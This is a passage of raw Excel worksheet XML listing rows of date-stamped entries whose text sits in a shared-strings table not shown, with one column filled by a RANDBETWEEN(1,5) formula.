        <v>43559.576585648145</v>
      </c>
      <c r="B15" t="s">
        <v>5</v>
      </c>
      <c r="C15" t="s">
        <v>29</v>
      </c>
      <c r="E15" t="s">
        <v>30</v>
      </c>
      <c r="F15">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16" s="1">
        <v>43559.576284722221</v>
      </c>
      <c r="B16" t="s">
        <v>19</v>
      </c>
      <c r="C16" t="s">
        <v>10</v>
      </c>
      <c r="D16" t="s">
        <v>23</v>
      </c>
      <c r="E16" t="s">
        <v>28</v>
      </c>
      <c r="F16">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17" s="1">
        <v>43559.573680555557</v>
      </c>
      <c r="B17" t="s">
        <v>5</v>
      </c>
      <c r="C17" t="s">
        <v>10</v>
      </c>
      <c r="D17" t="s">
        <v>23</v>
      </c>
      <c r="E17" t="s">
        <v>31</v>
      </c>
      <c r="F17">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" s="1">
        <v>43559.573414351849</v>
      </c>
      <c r="B18" t="s">
        <v>5</v>
      </c>
      <c r="C18" t="s">
        <v>10</v>
      </c>
      <c r="D18" t="s">
        <v>23</v>
      </c>
      <c r="E18" t="s">
        <v>31</v>
      </c>
      <c r="F18">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19" s="1">
        <v>43559.571122685185</v>
      </c>
      <c r="B19" t="s">
        <v>5</v>
      </c>
      <c r="C19" t="s">
        <v>29</v>
      </c>
      <c r="E19" t="s">
        <v>32</v>
      </c>
      <c r="F19">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20" s="1">
        <v>43559.562858796293</v>
      </c>
      <c r="B20" t="s">
        <v>19</v>
      </c>
      <c r="C20" t="s">
        <v>10</v>
      </c>
      <c r="D20" t="s">
        <v>23</v>
      </c>
      <c r="E20" t="s">
        <v>28</v>
      </c>
      <c r="F20">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21" s="1">
        <v>43559.474050925928</v>
      </c>
      <c r="B21" t="s">
        <v>5</v>
      </c>
      <c r="C21" t="s">
        <v>10</v>
      </c>
      <c r="D21" t="s">
        <v>33</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>34</v>
      </c>
      <c r="F21">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22" s="1">
        <v>43559.468356481484</v>
      </c>
      <c r="B22" t="s">
        <v>35</v>
      </c>
      <c r="C22" t="s">
        <v>10</v>
      </c>
      <c r="D22" t="s">
        <v>36</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>37</v>
      </c>
      <c r="F22">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23" s="1">
        <v>43559.455914351849</v>
      </c>
      <c r="B23" t="s">
        <v>5</v>
      </c>
      <c r="C23" t="s">
        <v>10</v>
      </c>
      <c r="D23" t="s">
        <v>6</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>38</v>
      </c>
      <c r="F23">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24" s="1">
        <v>43559.439050925925</v>
      </c>
      <c r="B24" t="s">
        <v>5</v>
      </c>
      <c r="C24" t="s">
        <v>10</v>
      </c>
      <c r="D24" t="s">
        <v>39</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>40</v>
      </c>
      <c r="F24">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25" s="1">
        <v>43559.399710648147</v>
      </c>
      <c r="B25" t="s">
        <v>5</v>
      </c>
      <c r="C25" t="s">
        <v>41</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F25">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26" s="1">
        <v>43559.387662037036</v>
      </c>
      <c r="B26" t="s">
        <v>19</v>
      </c>
      <c r="C26" t="s">
        <v>43</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>44</v>
      </c>
      <c r="F26">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27" s="1">
        <v>43559.374884259261</v>
      </c>
      <c r="B27" t="s">
        <v>5</v>
      </c>
      <c r="C27" t="s">
        <v>45</v>
      </c>
      <c r="D27" t="s">
        <v>46</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>47</v>
      </c>
      <c r="F27">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28" s="1">
        <v>43559.372129629628</v>
      </c>
      <c r="B28" t="s">
        <v>22</v>
      </c>
      <c r="C28" t="s">
        <v>48</v>
      </c>
      <c r="E28" t="s">
        <v>49</v>
      </c>
      <c r="F28">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A29" s="1">
        <v>43559.328020833331</v>
      </c>
      <c r="B29" t="s">
        <v>5</v>
      </c>
      <c r="C29" t="s">
        <v>50</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F29">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30" s="1">
        <v>43559.327581018515</v>
      </c>
      <c r="B30" t="s">
        <v>5</v>
      </c>
      <c r="C30" t="s">
        <v>10</v>
      </c>
      <c r="D30" t="s">
        <v>52</v>
      </c>
      <c r="E30" t="s">
        <v>53</v>
      </c>
      <c r="F30">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A31" s="1">
        <v>43559.318645833337</v>
      </c>
      <c r="B31" t="s">
        <v>22</v>
      </c>
      <c r="C31" t="s">
        <v>41</v>
      </c>
      <c r="E31" t="s">
        <v>54</v>
      </c>
      <c r="F31">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A32" s="1">
        <v>43559.315937500003</v>
      </c>
      <c r="B32" t="s">
        <v>13</v>
      </c>
      <c r="C32" t="s">
        <v>48</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>55</v>
      </c>
      <c r="F32">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A33" s="1">
        <v>43559.295717592591</v>
      </c>
      <c r="B33" t="s">
        <v>13</v>
      </c>
      <c r="C33" t="s">
        <v>48</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>57</v>
      </c>
      <c r="F33">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A34" s="1">
        <v>43559.264386574076</v>
      </c>
      <c r="B34" t="s">
        <v>13</v>
      </c>
      <c r="C34" t="s">
        <v>41</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>58</v>
      </c>
      <c r="F34">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A35" s="1">
        <v>43559.261458333334</v>
      </c>
      <c r="B35" t="s">
        <v>5</v>
      </c>
      <c r="C35" t="s">
        <v>48</v>
      </c>
      <c r="E35" t="s">
        <v>59</v>
      </c>
      <c r="F35">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A36" s="1">
        <v>43559.259710648148</v>
      </c>
      <c r="B36" t="s">
        <v>19</v>
      </c>
      <c r="C36" t="s">
        <v>60</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>61</v>
      </c>
      <c r="F36">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A37" s="1">
        <v>43559.253981481481</v>
      </c>
      <c r="B37" t="s">
        <v>13</v>
      </c>
      <c r="C37" t="s">
        <v>41</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>62</v>
      </c>
      <c r="F37">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A38" s="1">
        <v>43559.251793981479</v>
      </c>
      <c r="B38" t="s">
        <v>13</v>
      </c>
      <c r="C38" t="s">
        <v>63</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>64</v>
      </c>
      <c r="F38">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A39" s="1">
        <v>43559.22184027778</v>
      </c>
      <c r="B39" t="s">
        <v>5</v>
      </c>
      <c r="C39" t="s">
        <v>65</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>66</v>
      </c>
      <c r="F39">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A40" s="1">
        <v>43559.20553240741</v>
      </c>
      <c r="B40" t="s">
        <v>35</v>
      </c>
      <c r="C40" t="s">
        <v>67</v>
      </c>
      <c r="E40" s="2" t="s">
        <v>68</v>
      </c>
      <c r="F40">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A41" s="1">
        <v>43559.188159722224</v>
      </c>
      <c r="B41" t="s">
        <v>13</v>
      </c>
      <c r="C41" t="s">
        <v>69</v>
      </c>
      <c r="E41" s="2" t="s">
        <v>70</v>
      </c>
      <c r="F41">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A42" s="1">
        <v>43559.162615740737</v>
      </c>
      <c r="B42" t="s">
        <v>19</v>
      </c>
      <c r="C42" t="s">
        <v>71</v>
      </c>
      <c r="E42" s="2" t="s">
        <v>27447</v>
      </c>
      <c r="F42">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A43" s="1">
        <v>43559.149641203701</v>
      </c>
      <c r="B43" t="s">
        <v>22</v>
      </c>
      <c r="C43" t="s">
        <v>41</v>
      </c>
      <c r="E43" t="s">
        <v>72</v>
      </c>
      <c r="F43">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A44" s="1">
        <v>43559.125347222223</v>
      </c>
      <c r="B44" t="s">
        <v>5</v>
      </c>
      <c r="C44" t="s">
        <v>73</v>
      </c>
      <c r="E44" t="s">
        <v>74</v>
      </c>
      <c r="F44">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A45" s="1">
        <v>43559.056898148148</v>
      </c>
      <c r="B45" t="s">
        <v>5</v>
      </c>
      <c r="C45" t="s">
        <v>10</v>
      </c>
      <c r="D45" t="s">
        <v>6</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>75</v>
      </c>
      <c r="F45">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A46" s="1">
        <v>43559.008344907408</v>
      </c>
      <c r="B46" t="s">
        <v>5</v>
      </c>
      <c r="C46" t="s">
        <v>41</v>
      </c>
      <c r="E46" s="2" t="s">
        <v>76</v>
      </c>
      <c r="F46">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A47" s="1">
        <v>43558.99386574074</v>
      </c>
      <c r="B47" t="s">
        <v>19</v>
      </c>
      <c r="C47" t="s">
        <v>73</v>
      </c>
      <c r="E47" t="s">
        <v>77</v>
      </c>
      <c r="F47">
        <f t="shared" ca="1" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A48" s="1">
        <v>43558.97184027778</v>
      </c>
      <c r="B48" t="s">
        <v>19</v>
      </c>
      <c r="C48" t="s">
        <v>73</v>
      </c>
      <c r="E48" t="s">
        <v>78</v>
      </c>
      <c r="F48">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A49" s="1">
        <v>43558.845219907409</v>
      </c>
      <c r="B49" t="s">
        <v>13</v>
      </c>
      <c r="C49" t="s">
        <v>10</v>
      </c>
      <c r="D49" t="s">
        <v>46</v>
      </c>
      <c r="E49" s="2" t="s">
        <v>79</v>
      </c>
      <c r="F49">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A50" s="1">
        <v>43558.770486111112</v>
      </c>
      <c r="B50" t="s">
        <v>5</v>
      </c>
      <c r="C50" t="s">
        <v>10</v>
      </c>
      <c r="D50" t="s">
        <v>80</v>
      </c>
      <c r="E50" t="s">
        <v>81</v>
      </c>
      <c r="F50">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A51" s="1">
        <v>43558.688472222224</v>
      </c>
      <c r="B51" t="s">
        <v>9</v>
      </c>
      <c r="C51" t="s">
        <v>82</v>
      </c>
      <c r="E51" s="2" t="s">
        <v>83</v>
      </c>
      <c r="F51">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A52" s="1">
        <v>43558.6875</v>
      </c>
      <c r="B52" t="s">
        <v>19</v>
      </c>
      <c r="C52" t="s">
        <v>10</v>
      </c>
      <c r="D52" t="s">
        <v>11</v>
      </c>
      <c r="E52" s="2" t="s">
        <v>84</v>
      </c>
      <c r="F52">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A53" s="1">
        <v>43558.674861111111</v>
      </c>
      <c r="B53" t="s">
        <v>19</v>
      </c>
      <c r="C53" t="s">
        <v>10</v>
      </c>
      <c r="D53" t="s">
        <v>80</v>
      </c>
      <c r="E53" t="s">
        <v>85</v>
      </c>
      <c r="F53">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A54" s="1">
        <v>43558.673946759256</v>
      </c>
      <c r="B54" t="s">
        <v>5</v>
      </c>
      <c r="C54" t="s">
        <v>10</v>
      </c>
      <c r="D54" t="s">
        <v>86</v>
      </c>
      <c r="E54" t="s">
        <v>87</v>
      </c>
      <c r="F54">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A55" s="1">
        <v>43558.633703703701</v>
      </c>
      <c r="B55" t="s">
        <v>19</v>
      </c>
      <c r="C55" t="s">
        <v>10</v>
      </c>
      <c r="D55" t="s">
        <v>86</v>
      </c>
      <c r="E55" s="2" t="s">
        <v>88</v>
      </c>
      <c r="F55">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A56" s="1">
        <v>43558.58320601852</v>
      </c>
      <c r="B56" t="s">
        <v>5</v>
      </c>
      <c r="C56" t="s">
        <v>10</v>
      </c>
      <c r="D56" t="s">
        <v>89</v>
      </c>
      <c r="E56" s="2" t="s">
        <v>90</v>
      </c>
      <c r="F56">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A57" s="1">
        <v>43558.579363425924</v>
      </c>
      <c r="B57" t="s">
        <v>19</v>
      </c>
      <c r="C57" t="s">
        <v>10</v>
      </c>
      <c r="D57" t="s">
        <v>6</v>
      </c>
      <c r="E57" t="s">
        <v>91</v>
      </c>
      <c r="F57">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A58" s="1">
        <v>43558.571875000001</v>
      </c>
      <c r="B58" t="s">
        <v>5</v>
      </c>
      <c r="C58" t="s">
        <v>92</v>
      </c>
      <c r="D58" t="s">
        <v>17</v>
      </c>
      <c r="E58" s="2" t="s">
        <v>93</v>
      </c>
      <c r="F58">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A59" s="1">
        <v>43558.557337962964</v>
      </c>
      <c r="B59" t="s">
        <v>13</v>
      </c>
      <c r="C59" t="s">
        <v>10</v>
      </c>
      <c r="D59" t="s">
        <v>94</v>
      </c>
      <c r="E59" s="2" t="s">
        <v>95</v>
      </c>
      <c r="F59">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A60" s="1">
        <v>43558.552928240744</v>
      </c>
      <c r="B60" t="s">
        <v>5</v>
      </c>
      <c r="C60" t="s">
        <v>10</v>
      </c>
      <c r="D60" t="s">
        <v>46</v>
      </c>
      <c r="E60" t="s">
        <v>96</v>
      </c>
      <c r="F60">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A61" s="1">
        <v>43558.544722222221</v>
      </c>
      <c r="B61" t="s">
        <v>5</v>
      </c>
      <c r="C61" t="s">
        <v>97</v>
      </c>
      <c r="E61" t="s">
        <v>98</v>
      </c>
      <c r="F61">
        <f t="shared" ca="1" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A62" s="1">
        <v>43558.538842592592</v>
      </c>
      <c r="B62" t="s">
        <v>5</v>
      </c>
      <c r="C62" t="s">
        <v>6</v>
      </c>
      <c r="D62" t="s">
        <v>25</v>
      </c>
      <c r="F62">
        <f t="shared" ca="1" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A63" s="1">
        <v>43558.529722222222</v>
      </c>
      <c r="B63" t="s">
        <v>22</v>
      </c>
      <c r="C63" t="s">
        <v>48</v>
      </c>
      <c r="E63" t="s">
        <v>99</v>
      </c>
      <c r="F63">
        <f t="shared" ca="1" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="64" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A64" s="1">
        <v>43558.514837962961</v>
      </c>
      <c r="B64" t="s">
        <v>5</v>
      </c>
      <c r="C64" t="s">
        <v>6</v>
      </c>
      <c r="D64" t="s">
        <v>25</v>
      </c>
      <c r="E64" s="2" t="s">
        <v>100</v>
      </c>
      <c r="F64">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A65" s="1">
        <v>43558.502233796295</v>
      </c>
      <c r="B65" t="s">
        <v>13</v>
      </c>
      <c r="C65" t="s">
        <v>48</v>
      </c>
      <c r="E65" s="2" t="s">
        <v>101</v>
      </c>
      <c r="F65">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A66" s="1">
        <v>43558.497835648152</v>
      </c>
      <c r="B66" t="s">
        <v>5</v>
      </c>
      <c r="C66" t="s">
        <v>103</v>
      </c>
      <c r="E66" s="2" t="s">
        <v>104</v>
      </c>
      <c r="F66">
        <f t="shared" ref="F66:F129" ca="1" si="1">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A67" s="1">
        <v>43558.491006944445</v>
      </c>
      <c r="B67" t="s">
        <v>19</v>
      </c>
      <c r="C67" t="s">
        <v>6</v>
      </c>
      <c r="D67" t="s">
        <v>25</v>
      </c>
      <c r="E67" t="s">
        <v>105</v>
      </c>
      <c r="F67">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A68" s="1">
        <v>43558.472986111112</v>
      </c>
      <c r="B68" t="s">
        <v>19</v>
      </c>
      <c r="C68" t="s">
        <v>10</v>
      </c>
      <c r="D68" t="s">
        <v>46</v>
      </c>
      <c r="E68" t="s">
        <v>106</v>
      </c>
      <c r="F68">
        <f t="shared" ca="1" si="1"/>
        <v>4</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A69" s="1">
        <v>43558.463807870372</v>
      </c>
      <c r="B69" t="s">
        <v>22</v>
      </c>
      <c r="C69" t="s">
        <v>10</v>
      </c>
      <c r="D69" t="s">
        <v>107</v>
      </c>
      <c r="E69" t="s">
        <v>108</v>
      </c>
      <c r="F69">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A70" s="1">
        <v>43558.461863425924</v>
      </c>
      <c r="B70" t="s">
        <v>5</v>
      </c>
      <c r="C70" t="s">
        <v>16</v>
      </c>
      <c r="E70" s="2" t="s">
        <v>27448</v>
      </c>
      <c r="F70">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A71" s="1">
        <v>43558.455312500002</v>
      </c>
      <c r="B71" t="s">
        <v>5</v>
      </c>
      <c r="C71" t="s">
        <v>10</v>
      </c>
      <c r="D71" t="s">
        <v>89</v>
      </c>
      <c r="E71" s="2" t="s">
        <v>109</v>
      </c>
      <c r="F71">
        <f t="shared" ca="1" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="72" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A72" s="1">
        <v>43558.453715277778</v>
      </c>
      <c r="B72" t="s">
        <v>13</v>
      </c>
      <c r="C72" t="s">
        <v>10</v>
      </c>
      <c r="D72" t="s">
        <v>80</v>
      </c>
      <c r="E72" s="2" t="s">
        <v>110</v>
      </c>
      <c r="F72">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A73" s="1">
        <v>43558.450185185182</v>
      </c>
      <c r="B73" t="s">
        <v>9</v>
      </c>
      <c r="C73" t="s">
        <v>41</v>
      </c>
      <c r="E73" t="s">
        <v>111</v>
      </c>
      <c r="F73">
        <f t="shared" ca="1" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="74" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A74" s="1">
        <v>43558.448206018518</v>
      </c>
      <c r="B74" t="s">
        <v>5</v>
      </c>
      <c r="C74" t="s">
        <v>10</v>
      </c>
      <c r="D74" t="s">
        <v>112</v>
      </c>
      <c r="E74" s="2" t="s">
        <v>113</v>
      </c>
      <c r="F74">
        <f t="shared" ca="1" si="1"/>
        <v>2</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A75" s="1">
        <v>43558.446261574078</v>
      </c>
      <c r="B75" t="s">
        <v>19</v>
      </c>
      <c r="C75" t="s">
        <v>6</v>
      </c>
      <c r="D75" t="s">
        <v>114</v>
      </c>
      <c r="E75" t="s">
        <v>115</v>
      </c>
      <c r="F75">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A76" s="1">
        <v>43558.444178240738</v>
      </c>
      <c r="B76" t="s">
        <v>5</v>
      </c>
      <c r="C76" t="s">
        <v>6</v>
      </c>
      <c r="D76" t="s">
        <v>25</v>
      </c>
      <c r="E76" t="s">
        <v>116</v>
      </c>
      <c r="F76">
        <f t="shared" ca="1" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A77" s="1">
        <v>43558.439074074071</v>
      </c>
      <c r="B77" t="s">
        <v>9</v>
      </c>
      <c r="C77" t="s">
        <v>10</v>
      </c>
      <c r="D77" t="s">
        <v>20</v>
      </c>
      <c r="E77" t="s">
        <v>117</v>
      </c>
      <c r="F77">
        <f t="shared" ca="1" si="1"/>
        <v>2</v>
      </c>
    </row>
    <row r="78" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A78" s="1">
        <v>43558.4371875</v>
      </c>
      <c r="B78" t="s">
        <v>5</v>
      </c>
      <c r="C78" t="s">
        <v>65</v>
      </c>
      <c r="E78" s="2" t="s">
        <v>27456</v>
      </c>
      <c r="F78">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="79" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A79" s="1">
        <v>43558.37703703704</v>
      </c>
      <c r="B79" t="s">
        <v>22</v>
      </c>
      <c r="C79" t="s">
        <v>118</v>
      </c>
      <c r="E79" s="2" t="s">
        <v>119</v>
      </c>
      <c r="F79">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A80" s="1">
        <v>43558.373067129629</v>
      </c>
      <c r="B80" t="s">
        <v>5</v>
      </c>
      <c r="C80" t="s">
        <v>10</v>
      </c>
      <c r="D80" t="s">
        <v>39</v>
      </c>
      <c r="E80" t="s">
        <v>120</v>
      </c>
      <c r="F80">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="81" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A81" s="1">
        <v>43558.357453703706</v>
      </c>
      <c r="B81" t="s">
        <v>9</v>
      </c>
      <c r="C81" t="s">
        <v>48</v>
      </c>
      <c r="E81" s="2" t="s">
        <v>121</v>
      </c>
      <c r="F81">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A82" s="1">
        <v>43558.334652777776</v>
      </c>
      <c r="B82" t="s">
        <v>19</v>
      </c>
      <c r="C82" t="s">
        <v>41</v>
      </c>
      <c r="E82" s="2" t="s">
        <v>122</v>
      </c>
      <c r="F82">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="83" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A83" s="1">
        <v>43558.327407407407</v>
      </c>
      <c r="B83" t="s">
        <v>5</v>
      </c>
      <c r="C83" t="s">
        <v>63</v>
      </c>
      <c r="E83" s="2" t="s">
        <v>123</v>
      </c>
      <c r="F83">
        <f t="shared" ca="1" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A84" s="1">
        <v>43558.323900462965</v>
      </c>
      <c r="B84" t="s">
        <v>19</v>
      </c>
      <c r="C84" t="s">
        <v>6</v>
      </c>
      <c r="D84" t="s">
        <v>124</v>
      </c>
      <c r="E84" t="s">
        <v>125</v>
      </c>
      <c r="F84">
        <f t="shared" ca="1" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A85" s="1">
        <v>43558.284988425927</v>
      </c>
      <c r="B85" t="s">
        <v>5</v>
      </c>
      <c r="C85" t="s">
        <v>41</v>
      </c>
      <c r="F85">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A86" s="1">
        <v>43558.265173611115</v>
      </c>
      <c r="B86" t="s">
        <v>13</v>
      </c>
      <c r="C86" t="s">
        <v>48</v>
      </c>
      <c r="E86" t="s">
        <v>126</v>
      </c>
      <c r="F86">
        <f t="shared" ca="1" si="1"/>
        <v>3</v>
      </c>
    </row>
